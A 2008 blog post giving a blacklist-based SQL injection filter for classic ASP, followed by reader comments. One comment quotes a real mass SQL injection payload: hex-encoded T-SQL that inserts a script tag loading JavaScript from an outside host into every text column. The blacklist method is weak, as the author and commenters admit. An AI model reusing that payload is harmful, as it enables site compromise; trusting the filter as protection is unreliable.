Filtering SQL injection from Classic ASP

Monday, April 28, 2008

SQL injection may be over a decade old, but even the best of us need a reminder once in a while. You should always validate input to your applications! There isn’t a ‘one size fits all’ solution to sanitizing input, so I will attempt to show what a general solution might look like for classic ASP (using VBScript). Remember, you need to keep in mind the specifics of your web application and add/remove things in the sample accordingly. So even though I am focusing on SQL injection here, input validation needs to be done to even prevent cross-site scripting attacks, among others. Check this article on how to prevent XSS to give you an idea of other sorts of validation that would need to be done on user input to secure a web application. If you are looking for something for ASP.NET check out this post from Stefan on the ASP.NET team.

Now that UrlScan v3.0 (x86, x64) is out I would highly recommend using that instead of this script. There is also a walk-through for it on implementing SQL injection blocking configuration.

Please note:

The purpose of this sample is to get folks off the ground and up and running. This is not intended to be a long-term solution to solving SQL injection attacks against your application. Using black lists like in the sample tend to give a lot of false positives that make many applications unusable. Increasing complexity in the list to avoid this leads to performance issues. Also, such simplistic signatures can be worked around by determined hackers. Consider UN/**/ION for example.

You want to use white lists and rules to sanitize input. You should restrict your web application to using stored procedures and calling them using parameterized SQL APIs.

The way this sample is constructed is that I have a script that checks certain inputs against a ‘black list’ of strings, and if I find a match I redirect to an error page. This script can then be ‘included’ into all public facing application scripts that process user input. There are 3 pieces to this solution: the script with the filtering logic, a sample application that will ‘include’ the filtering script and an error page we would forward to. I have added comments to the scripts themselves, so you have the reminders in front of you. Several folks asked about a send email script, so I have included a sample script for that as well. You will need to incorporate it into your application appropriately. Make sure you read the comments in the code as well for all the assumptions. The right way to do db access from web applications is to use parameterized SQL. Check out Neil Carpenter's blog here on what this looks like.

SqlCheckInclude.asp

This is the code that does the main filtering. Copy the code below into an ASP file and modify according to your needs. The main things you need to add/modify for your needs are the BlackList array and the ErrorPage you want to forward to. Deploy this file in a location that will be accessible to all your web applications. Make sure that the path to your error page is correct. Use a full path here if possible, since this code will get ‘included’ into several applications that may all reside in different physical directories.

<% 
'  SqlCheckInclude.asp
'
'  Author: Nazim Lala
'
'  This is the include file to use with your asp pages to 
'  validate input for SQL injection.


Dim BlackList, ErrorPage, s

'
'  Below is a black list that will block certain SQL commands and 
'  sequences used in SQL injection will help with input sanitization
'
'  However this is may not suffice, because:
'  1) These might not cover all the cases (like encoded characters)
'  2) This may disallow legitimate input
'
'  Creating a raw sql query strings by concatenating user input is 
'  unsafe programming practice. It is advised that you use parameterized
'  SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
'  on how to do this using ADO from ASP.
'
'  Moreover, you need to also implement a white list for your parameters.
'  For example, if you are expecting input for a zipcode you should create
'  a validation rule that will only allow 5 characters in [0-9].
'

BlackList = Array("--", ";", "/*", "*/", "@@", "@",_
                  "char", "nchar", "varchar", "nvarchar",_
                  "alter", "begin", "cast", "create", "cursor",_
                  "declare", "delete", "drop", "end", "exec",_
                  "execute", "fetch", "insert", "kill", "open",_
                  "select", "sys", "sysobjects", "syscolumns",_
                  "table", "update")

'  Populate the error page you want to redirect to in case the 
'  check fails.

ErrorPage = "/ErrorPage.asp"
               
'''''''''''''''''''''''''''''''''''''''''''''''''''               
'  This function does not check for encoded characters
'  since we do not know the form of encoding your application
'  uses. Add the appropriate logic to deal with encoded characters
'  in here 
'''''''''''''''''''''''''''''''''''''''''''''''''''
Function CheckStringForSQL(str) 
  On Error Resume Next 
  
  Dim lstr 
  
  ' If the string is empty, return true
  If ( IsEmpty(str) ) Then
    CheckStringForSQL = false
    Exit Function
  ElseIf ( StrComp(str, "") = 0 ) Then
    CheckStringForSQL = false
    Exit Function
  End If
  
  lstr = LCase(str)
  
  ' Check if the string contains any patterns in our
  ' black list
  For Each s in BlackList
  
    If ( InStr (lstr, s) <> 0 ) Then
      CheckStringForSQL = true
      Exit Function
    End If
  
  Next
  
  CheckStringForSQL = false
  
End Function 


'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check forms data
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.Form
  If ( CheckStringForSQL(Request.Form(s)) ) Then
  
    ' Redirect to an error page
    Response.Redirect(ErrorPage)
  
  End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check query string
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.QueryString
  If ( CheckStringForSQL(Request.QueryString(s)) ) Then
  
    ' Redirect to error page
    Response.Redirect(ErrorPage)

    End If
  
Next


'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check cookies
'''''''''''''''''''''''''''''''''''''''''''''''''''

For Each s in Request.Cookies
  If ( CheckStringForSQL(Request.Cookies(s)) ) Then
  
    ' Redirect to error page
    Response.Redirect(ErrorPage)

  End If
  
Next


'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Add additional checks for input that your application
'  uses. (for example various request headers your app 
'  might use)
'''''''''''''''''''''''''''''''''''''''''''''''''''

%>

TestPage.asp

This is a sample that shows how to ‘include’ the script above in my application. Make sure the path to your include file is correct. The example below is for the application and the include file being in the same directory. Make sure you modify the path if these 2 are not in the same directory.

<% 
'  TestPage.asp
'
'  Author: Nazim Lala
'
'  This is a file to test the SQLCheckInclude file. The idea here is that you add
'  the include file to the beginning of every asp page to get SQL injection 
'  input validation


%>

<!--#include file="SqlCheckInclude.asp"-->
<%
Response.Write("Welcome to the Test Page.")
Response.Write("If you are seeing this page then SQL validation succeeded.")
%>

ErrorPage.asp

If a ‘black list’ string is found in any input, this is the page you will be forwarded to. You can reuse any custom error page that you already have for this. I am including this only for the sake of completeness.

<% 
'  ErrorPage.asp
'
'  Author: Nazim Lala
'
'  This is the error page that users will be redirected to if the input cannot
'  be validated

%>
<%Response.Write("ERROR: Invalid Input")%>

SendEmail.asp

This script sends email via a remote SMTP server that uses credentials. You will need to integrate this into your application at the right place to get error reporting via email.

<% 

'  SendEmail.asp
'  Author: Nazim Lala
    
Function SendEmail(email, msg) 
  On Error Resume Next 
  
  ' If the string is empty, return false
  If ( IsEmpty(email) ) Then
    SendEmail = false
    Exit Function
  ElseIf ( StrComp(email, "") = 0 ) Then
    SendEmail = false
    Exit Function
  End If
  

  Set cdoConfig = CreateObject("CDO.Configuration")  

  With cdoConfig.Fields  
      .Item(cdoSendUsingMethod) = cdoSendUsingPort  
      ' Fill in server name for remote SMTP server and
      ' credentials
      .Item(cdoSMTPServer) = "smtpserver.foo.com"  
      .Item(cdoSMTPAuthenticate) = 1  
      .Item(cdoSendUsername) = "username"  
      .Item(cdoSendPassword) = "password"  
      .Update  
  End With 

  Set cdoMessage = CreateObject("CDO.Message")  

  With cdoMessage 
    'Fill in sender information
    Set .Configuration = cdoConfig 
    .From = "me@myself.com" 
    .To = email 
    .Subject = "Test Email" 
    .TextBody = msg 
    .Send 
  End With 

  Set cdoMessage = Nothing  
  Set cdoConfig = Nothing  
  
  SendEmail = true
  
End Function 


%>


<FORM VERB=POST METHOD="POST"> 
Test page for checking input with possible SQL injection.<br><br>
Email: <INPUT NAME=Email></INPUT><BR>
Message: <INPUT NAME=Message></INPUT><BR>
Sent: <% = SendEmail(Request("Email"),Request("Message")) %><BR> 
<BUTTON TYPE=SUBMIT>Submit</BUTTON> 
</FORM>

Hope this helps. If folks are averse to VBScript I can cook up something for Jscript if there is demand.

69 Comments

great script !!

I'm having problems with the :

For Each s in Request.Form
If ( CheckStringForSQL(s) ) Then

if i do a response.write (s) its the name of the fields that are written out, not their values....

therefore its not actually looking at the correct bit...

??

qt11 - Tuesday, April 29, 2008 12:50:57 PM

also, please check the code, there's a few errors in there...

"select, ""sys",

anyone know how to get the values for the form information rather than the attribute names ?

qt11 - Tuesday, April 29, 2008 1:41:36 PM

you are right ... I am looking at form keys, instead of values ... I will update the script.
Thanks

naziml - Wednesday, April 30, 2008 8:27:34 PM

Ok, I just fixed the form value lookup, and the quotes issue in the blacklist. Thanks for pointing it out.

naziml - Wednesday, April 30, 2008 8:33:42 PM

welcome to blogosphere Nazim, it's great to have a security-focused blog for IIS!

bills - Thursday, May 1, 2008 1:54:47 AM

if we take each string and replace any single quotes with two single quotes, is there still a way to do sql injection?

mendel - Friday, May 2, 2008 5:13:23 PM

Disallowing single quotes does the trick for the most part. You have to watch out for encoding though. Also you might end up disallowing valid scenarios. For example, what if you want to enter the name O'Connor?

naziml - Friday, May 2, 2008 11:17:32 PM

I added a script sample to send email via a remote SMTP server. HTH.

naziml - Monday, May 5, 2008 4:14:25 PM

O'Connor gets replaced with O''Connor, which SQL server correctly interprets as O'Connor.

could you give us examples of how encoding could get by this check (isn't any url encoding decoded by IIS so I get the decoded value in my code?)

mendel - Monday, May 5, 2008 5:09:28 PM

isn't any url encoding decoded by IIS so I get the decoded value in my code
Not for querystring. The problem is that there is no *standard* encoding mechanism for querystrings. Apps use a variety of things. For example your application may HTML escape the querystring, so you could bypass the check using .
Also for the O'Connor example, the input form would need to replace the ' with '', correct? And SQL will escape it correctly then?

naziml - Tuesday, May 6, 2008 12:10:44 AM

How do I validate this sample query stirng?

place_details.asp?content=;

because before the blacklisted symbol is the equal = sign, it doesn't redirect me on the error site.
Please help

Ejhay - Tuesday, May 13, 2008 7:50:11 AM

You need to update the querystring For Loop to check the string value not the id.

For Each s in Request.QueryString
'Response.Write(s & " = " & Request.QueryString(s) & VbCrLf)
If (CheckStringForSQL(Request.QueryString(s)) ) Then

' Redirect to error page
Response.Redirect(ErrorPage)

End If

Next

Ray - Tuesday, May 13, 2008 1:14:04 PM

I notice that there are some issues here... or at least I think so based on the intent of this code.

The CheckStringForSQL for querystrings line should be:

If ( CheckStringForSQL(request.querystring(s)) ) Then

and the one for cookies should be:

If ( CheckStringForSQL(request.cookies(s)) ) Then

Otherwise you're checking only the names and not the actual values.

Also, you may want to note that if you want to send an email warning that shows the values being passed/used, that should go in the sqlcheck.asp script and not the errorpage.asp script.

NOT criticism, just trying to be helpful and save someone else some time in the future. :-)

CodeWhisperer - Sunday, May 18, 2008 1:34:47 PM

Please check last 2 comments and change code!!!
The following test string default.asp?page=test'%20;%20insert%20INTO%20_atest%20(_name)%20VALUES('hello1')-- is not detected by existing code without the changes mentioned.

G:-) - Monday, May 19, 2008 3:38:54 AM

Sorry ... I somehow edited only the first one and missed the next two.

naziml - Monday, May 19, 2008 5:25:59 AM

Can you explain how if the string is empty it returns "true" while CheckStringForSQL= false?:
' If the string is empty, return true
If ( IsEmpty(str) ) Then
CheckStringForSQL = false
Exit Function

zeWEBHOST - Tuesday, May 20, 2008 8:56:00 AM

Instead of parsing the string using Request.QuerString, get the whole query string usin g Request.Servervariables("QUERY_STRING") because the a request in the following format will not be parsed:

=================
Recommended change
=================
For each s in Request.ServerVariables("QUERY_STRING")

If ( CheckStringForSQL(s) ) Then

' Redirect to error page
Response.Redirect(ErrorPage)

End If

Next

Anonymous - Tuesday, May 20, 2008 8:04:54 PM

zeWEBHOST: An empty string can't contain anything on the SQL injection blacklist, hence we return false for empty strings.

Anonymous: I have not tested querystrings with form actions. I would assume that this would trigger a new request where Request.QueryString is appropriately populated. Let me test this out, and if this is not the case, I will update the script. Thanks.

naziml - Thursday, May 22, 2008 4:26:06 AM

Why, if I use your code in the test page it works, but does not work in a real asp page giving me this error? Microsoft VBScript compilation error '800a0411'

Name redefined

Marina - Thursday, May 22, 2008 8:51:01 AM

sorry, now it works...

marina - Thursday, May 22, 2008 8:57:27 AM

I'm having a problem using your filter. If for example the name of the user in the input field is Castagna, the user cannot register him self because his name contain the blacklisted word CAST. Obviously this will happen with all names or words containing balcklisted terms. This fact do make impossible to use your nice script. Is it possible to find a way that rejects only isolated word and not the blacklisted word contained in more complex words. Thanx. Marina

marina - Thursday, May 22, 2008 1:25:46 PM

how about adding the names of tables in the database to the blacklist? would that be enough to prevent any changes to the tables in use?

or am I just missing something here? not the most experienced on this field, just had a site mangled recently.

anti - Friday, May 23, 2008 7:21:31 AM

I used this script on a couple of my sites and it works just fine. However, on an older ASP site it gives the following error:

---------
Microsoft VBScript runtime error '800a01f4'

Variable is undefined: 'ss'

/tlt/sqlvalidation.asp, line 82
-------

Any idea what could be causing this?

Anthony - Saturday, May 24, 2008 2:53:55 PM

Sorry, that 'ss' should be an 's'

Anthony - Saturday, May 24, 2008 7:29:24 PM

Please check you might be using Option Explicit

Ali Hasan - Tuesday, May 27, 2008 5:47:50 PM

What about if the input is an Email address? the two strings "@" and "@@" will return to the error page. How to prevent this without moving them?

zeWEBHOST - Wednesday, May 28, 2008 12:43:16 PM

The list of strings I have put up is only a sample. I am aware that you will get false positives with it. If you look at the comments in the scripts it will give you some suggestions around this. Do note that this is a quick fix to get you up and running. What you really want to do is use a combination of whitelist/blacklist along with parameterized SQL.

Currently I am just using InStr to see if I find a string. You could modify that logic to check for a whitespace around it to avoid some false positives due to substrings. You need to use some caution though, because you might just introduce a way to get past your filter with this (which is why I did not do it for the sample).

NazimL - Thursday, May 29, 2008 8:16:59 PM

Suggestion to microsoft for blocking sql injection attacks:

one of the significant differences between sql and msacces (jet) is that sql allows multiple commands in a single sql statement.

while that ability is very good, it's rarely if ever needed in a website.

I would like to suggest that microsoft release a patch to sql server that would add a specific permission on a user to allow or deny the ability to run multi-command statments.

if that option was there, I think that 99% of websites could be protected just by blocking that ability.

Mendel - Friday, May 30, 2008 4:24:24 PM

Why don't you recommend the use of parametized queries (e.g. using ADO command objects) instead? Surely that would obviate the need for this type of code?

Ken Schaefer - Saturday, May 31, 2008 5:43:49 AM

Thank you Nazimil :)

Your efforts on this helpful script are greatly appreciated and your blog a great learning experience!

Cheers

Will Qunit - Monday, June 2, 2008 1:48:19 PM

Once again ... I definitely recommend using parameterized SQL ... see the first comment block in the ASP script. I even have a link in there on how to use this with ADO in classic ASP. I specifically put this into the script as coments because a lot of folks will just cut and paste the sample, without bothering to read the post.

NazimL - Monday, June 2, 2008 7:59:13 PM

There is an important aspect of SQL injection missing:
Your routine does not check for quotes. A single quote (') is the basic principle of SQL injection - it allows to 'escape' from the originally intended SQL statement. Thus, you need to add the quote charater (') and other possible 'escapes' to your blacklist.

Quotes missing - Wednesday, June 4, 2008 7:04:07 AM

This is VERY helpful. Thank you for this. It is the fastest way to at least prevent someone from deleting all the data in your database. Yes you should use better measures but if you want to do something RIGHT NOW while you are recoding to use sql parameters this is better than nothing.

Michael - Wednesday, June 4, 2008 3:45:42 PM

thanks man! I've been attacked with some SQL Injection a few days ago so i'll apply this script on my website ASAP.

Anonymous - Thursday, June 5, 2008 5:11:35 PM

Checking for single quote (') will lead to too many false positives, and hence not included. In most cases, this will need to be used in conjuction with (--) to comment out the rest of the query, and since I have that on the list, it should suffice.

naziml - Thursday, June 5, 2008 11:45:54 PM

My company just bought an asp-component called SecureRequest (http://www.securerequest.net) that works in a simular fasion as in this article. But with this component you can also replace values and block regular-expression patterns!

I might also recomend the SQL-injection vulnerabilities analyzer that they have on their website: http://www.securerequest.net/analyze.aspx - helped me a lot!

//Rufus

Anonymous - Tuesday, June 10, 2008 1:21:17 PM

Hi!

Do you have Jscript version at hand?

Regards,
TomazL

Anonymous - Saturday, June 21, 2008 6:26:34 PM

Hi,

Was thinking it would be nice to block the ip address of the attacker from visiting the site in IIS. I know how to do this manually, would it be possible to do this programmatically each time a positive attack is detected?

Thanks,

Martin

Anonymous - Sunday, June 22, 2008 5:12:36 PM

Hi!

I have converted VB to JS if anyone would need it. Please, take care, because it is not 100% tested! But it works fine for us:

<%

var BlackList;
BlackList = new Array("--", "/*", "*/", "@@",
"alter ", "begin ", "cast ", "create ", "cursor ",
"declare ", "delete ", "drop ", "exec ",
"execute ", "fetch ", "insert ", "open ",
"select ", "sysobjects", "syscolumns",
"table ", "update ", "<scrip", "</scrip");

ErrorPage = "/ErrorPage.asp";

function CheckStringForSQL(str)
{
//If the string is empty, return true
if(str == undefined)
{
return(false);
}
//check if length is 0
if (str.length == 0)
{
return(false);
}
//Check if the string contains any patterns in our
//black list
var i;
for (i = 0; i

Anonymous - Monday, June 23, 2008 8:57:10 AM

Mendel asks if there is a way to do SQL injection if all single quotes are escaped and anti suggests filtering out table names.

One of the current attacks uses T-SQL encoded in hexadecimal to obscure all single quotes and most of the SQL key words (including all table names). E.g.,

product_id=37;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(some nasty hex encoded T-SQL here%20AS%20VARCHAR(4000));EXEC(@S);--

This worked on pages that expected stuff like product_id=37 in the querystring and build a query without putting single quotes around product_id. Something like:

"SELECT * FROM products WHERE product_id = " & Replace(product_id, "'", "''")

Escaping the quotes and filtering for table names makes no difference, but (and maybe I'm wrong) rewriting the query with single quotes around the product_id would stop the attack:

"SELECT * FROM products WHERE product_id = '" & Replace(product_id, "'", "''") & "'"

Surely

SELECT * FROM products WHERE product_id = '37;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(some nasty hex encoded T-SQL here%20AS%20VARCHAR(4000));EXEC(@S);--'

isn't going to execute the way the attacker intends. Everything between the single quotes is going to be treated as a string instead of executing, yes?

Maybe the question should be: "Is there a known way to do SQL injection if all single quotes are escaped and all input values are surrounded by single quotes." If the answer is no, then why bother with filtering, parameterized queries, etc.? I have seen articles which claim to give examples, but if you actually take the time to substitute the example SQL into the dynamic query it becomes clear nothing bad would happen. So, someone please show me a working example before I go recoding everything with parameterized (ugh) queries.

Anonymous - Friday, June 27, 2008 8:33:23 AM

The only problem with the escaping approach is that the hacker can just start his injection with a ' to end your qoutes. So for example

1 or 1=1'; Do some nastiness here in hex etc....;

At the end of the day there are many different ways to inject sql and you need to protect against them all.

Anonymous - Friday, June 27, 2008 8:45:29 AM

Try what you suggested or write it out. It won't do anything. Any ' will get escaped and interpreted as a literal. SQL will search the DB for a weird string and return no match.

Again, show me a working example.

Anonymous - Friday, June 27, 2008 10:18:08 AM

I have no objection to filtering or other technique--even if there is no way to do SQL injection when everything is escaped and between single quotes, doesn't mean some coder won't slip up.

Anonymous - Friday, June 27, 2008 10:22:03 AM

Hi I am Anshuk. My web site has been attacked in a similar way.

ID=308;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E626E727570646174652E6D6F62692F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

I have used the following code to fix it.

when ever i use a value from querystring like request("productID") i encase it in
dbsafe2(request("productID"),"Numeric")
or if it is a string then
dbsafe2(request("productName"),"string")

function dbsafe2(data,dtype)
if (instr(data,"update")) or (instr(data,"delete")) or (instr(data,"select")) or (instr(data,"group by")) or (instr(data,"having")) or (instr(data,"<script")) or (instr(data,"CAST")) then
Set myMail=CreateObject("CDO.Message")
myMail.Subject="DBSAFE2 Someone is trying to fuck us, But he couldnt...he he"
myMail.From="anti-hack@mee.com"
myMail.To="mee@mee.com"
myMail.HTMLBody = "Someone is trying to fuck our database. Hacker's Details: IP Address: "&Request.ServerVariables("REMOTE_ADDR")&"Target Page: http://tulleeho.com"& Request.ServerVariables("SCRIPT_NAME") &"Browser/OS Info: "& Request.ServerVariables("HTTP_USER_AGENT") &"Logon User: "& request.ServerVariables("LOGON_USER") &"Request Method: "& request.ServerVariables("REQUEST_METHOD") &"Post Data: "& data &"Querystring: "&request.ServerVariables("QUERY_STRING") &"Cookies: "&request.ServerVariables("HTTP_COOKIE") &"Test DBSAFEServer Date/Time: " & now()
myMail.Send
set myMail=nothing
end if

if lcase(dtype) = "numeric" then
if Not IsNumeric(data) then data=0
else
data = replace(data,"'","''")
End if
dbsafe2 = data
end function

contact: anshukk @ gmail . com

Anonymous - Monday, June 30, 2008 1:42:58 PM

naziml, may 22, in an answer to anonymous, you say

"Anonymous: I have not tested querystrings with form actions. I would assume that this would trigger a new request where Request.QueryString is appropriately populated. Let me test this out, and if this is not the case, I will update the script. Thanks."

Have you checked into this difference?
What is the result...?

Anonymous - Saturday, July 5, 2008 11:29:21 PM

Anonymous' June 30, 2008 post is nice because it combines the blacklist with a datatype check. You might also consider a value length check. Limiting the number of characters can really make it tougher on the attacker. What can they really do with say 20 characters to play with?

Something like...

function dbsafe2(data, dtype, maxlength)

Anonymous - Monday, July 7, 2008 7:27:11 PM

So here's what I came up with after a bit of tinkering. I stuck this in my data access layer's base class, which is inherited by all my data access objects. I mostly use it for my complicated searches, for which I still can't seem to get away from dynamic SQL.

The blacklist might be a bit too extensive to real use. Edit as you need.

/// Validate and filter each value supplied by the user for use in the whereClause.
/// The value to validate

/// The most characters permitted

/// The value after validation and filtering
/// This method is provided to help guard against SQL injection attacks. It escapes single quotes with two single quotes and removes the comment markings.
protected static String CleanValue(String userValue, Int32 maxLength)
{
// Throw an exception if a blacklisted word is detected.
String[] blackList = {
"alter",
"begin",
"cast",
"create",
"cursor",

"declare",
"delete",
"drop",
"exec",

"execute",
"fetch",
"insert",
"kill",
"open",

"select",
"sys",
"sysobjects",
"syscolumns",

"table",
"update",
"<script",
"</script"
};

for (int i = 0; i = maxLength)
throw new ArgumentOutOfRangeException();

// Replace single quotes with two single quotes and remove any comment markings.
String result = userValue.Replace("'", "");
result = result.Replace("--", "");
result = result.Replace("/*", "");
result = result.Replace("*/", "");
result = result.Replace("@@", "");
result = result.Replace("@", "");

return result;
}

Regards, BPM

Anonymous - Tuesday, July 8, 2008 4:48:18 AM

Hi there, I have just had an attack too. Lots of script and js messages in my tables.

If i add the SqlCheckInclude.asp include to every page will this prevent further attacks do you think?

I have uploaded it and the testpage.asp to my server and when I point the browser directly at the testpag.asp and it gives this message

Welcome to the Test Page.If you are seeing this page then SQL validation succeeded.

So I presume the code has worked?

But then how do I actually know it has worked? Is there some kind of code I can run to test to see if it works?

Anonymous - Tuesday, July 8, 2008 11:32:51 AM

Hi

What dos "end" i the blacklist do to SQL

When i run the script with blacklist and all i'v get the errorpage, when i remove "end", from the blacklist it's works OK.

Can anyone explane that to me, Thanks

Anonymous - Wednesday, July 9, 2008 7:08:37 PM

if something like 'end' is blocking you, it might inadvertently be part of your request. I hit this in my ASP.net session cookie :)

naziml - Thursday, July 10, 2008 11:12:23 PM

Thanks Rufus!
--My company just bought an asp-component called SecureRequest (http://www.securerequest.net) that works in a simular fasion as in this article. But with this component you can also replace values and block regular-expression patterns!

I might also recomend the SQL-injection vulnerabilities analyzer that they have on their website: http://www.securerequest.net/analyze.aspx - helped me a lot!

//Rufus--

I've downloaded and installed it! Works perfectely! Minor issues but their support was great!
Rolf

Anonymous - Friday, July 11, 2008 9:40:28 AM

hai i got below error hw to solve it ... i am not a asp programmer ... so pls give ur suggestion to solve it....

Error Type:
Microsoft VBScript runtime (0x800A01F4)
Variable is undefined: 's'
admin/SqlCheckInclude.asp, line 86

Anonymous - Saturday, July 12, 2008 10:08:40 AM

Naz, thanks for this article, it was a great help as a starting point to get some ideas....well written and good comments (for the most part) as well.

Anonymous - Sunday, July 13, 2008 7:39:33 AM

Nazim,
just a quick note to say thanks for this. We have had it in operation for over a month and it is working to protect our site, whilst we get the developers to implement a more appropriate way of dealing with sql. Our only mod was to tweak the blacklist a little.

To give people an idea in the last 2 weeks we have received 2400 sql injection attempts, all fialed, and only have one very wierd error (but it is a Mac ;-)) when no string at all is attached to the URL, will post if I ever solve it.

One small note to those getting the "variable undefined: 's'" problem just add s to the Dim statement at the top of the code e.g;
Dim BlackList, ErrorPage, s

Thanks again, we are very grateful.
G:-)

Anonymous - Wednesday, July 16, 2008 1:18:56 AM

Anonymous - Monday, July 21, 2008 2:35:04 PM

Thanks a lot this is the best validation code I saw.

Anonymous - Thursday, July 31, 2008 10:33:20 PM

URLScan is a great defense mechanism for web server attacks, but I have found that it is not flexible enough to defend against web application-level attacks like SQL Injection. The group I work with just released a free module for IIS (called SPF) that provides a flexible mechanism for blocking malicious requests. SPF can be downloaded from our website: http://www.gdssecurity.com/l/t.php

It provides coverage options for Query Strings, POST data and Cookies (where as URL Scan is limited to just Query Strings). It also supports use of regular expressions to define malicious input sequences, allowing more complex patterns to reduce the likelihood of false positives. You can find out more about it from the following Blog post: http://www.gdssecurity.com/l/b/2008/08/22/iis-secure-parameter-filter-spf-released/

bholyfield - Tuesday, September 2, 2008 6:53:12 AM

I'm sorry but this is *horrible* advice. You will end up discarding 90% of legitimate requests and not prevent a single SQL injection.

Convert ' to '' if you're expecting a string, and convert to a number if you expect a number. Then build your SQL statement from that.

Also, you seem to be having a slight spam problem here.

dawidi - Thursday, October 30, 2008 1:13:55 PM

I understand it's just an example, but let's say you try to implement this script on a page that receives a search form via GET. Some of the blacklisted words can easily be found in a valid search term.

Let's say it's a search on a movie review site and a user searches for "kill bill". The querystring would likely be something along the lines of "?q=kill%20bill" and this validator would not allow that, am I right?

Oddish - Wednesday, January 21, 2009 10:31:38 AM

Pray tell, why is anyone running NoScript a fool? I thought it was pretty obvious that it greatly increases security, and not only that, it also removes most of the stupid advertising

ssk sorgulama - Saturday, January 31, 2009 12:20:33 PM

I will attempt to show what a general solution might look like for classic ASP (using VBScript). Remember, you need to keep in mind the specifics of your web application and add/remove things in the sample accordingly. So even though I am focusing on SQL injection here, input validation needs to be done to even prevent cross-site scripting attacks, among others

Oyun - Wednesday, February 4, 2009 7:26:25 PM

to filter comcast just add a space after "cast". i.e., "cast "

edc - Tuesday, February 10, 2009 7:57:16 PM

I was looking for this to filter comcast just add a space after "cast". i.e., "cast ". Thanks.

islami forum - Friday, February 13, 2009 6:21:53 PM

Would it make sense to count how many Blacklist values are used per field? For example, I have a field that should allow "O'Caston" and another field that should allow ">0 and <100" but neither field should allow ', cast, . If I do a count (along with your code) and find more than two Blacklist values, would this be enough to stop an attack?

govt-tt - Thursday, February 19, 2009 3:00:15 PM

should allow "O'Caston" and another field that should allow ">0 and <100" but neither field should allow ', cast, . If I do a count (along with your code) and find more than two Blacklist values, would this be enough to stop an attack? thanks

e-okul - Thursday, February 19, 2009 8:25:35 PM

I want to use it - but I have a problem. I secured the /wp-admin/ with a htaccess pass. So I need to enter a pass before I get to the admin-login.

Fine, BUT if I use the Plugin given by you, I need to enter the pass too, but my users of course do not know the pass. How can I get rid of this problem? Any help appreciated.

evden eve - Wednesday, February 25, 2009 3:01:02 AM

SQL injection may be over a decade old, but even the best of us need a reminder once in a while.

Technomarine - Wednesday, February 25, 2009 1:31:15 PM

I don't think this using only security bro.
Some bad persons use for the sql injection hacking but however this is a good article thanks..
 

simasher - Sunday, March 8, 2009 6:23:14 PM

Old but great post.

Web hosting - Tuesday, December 21, 2010 12:28:52 PM

Comments have been disabled for this content.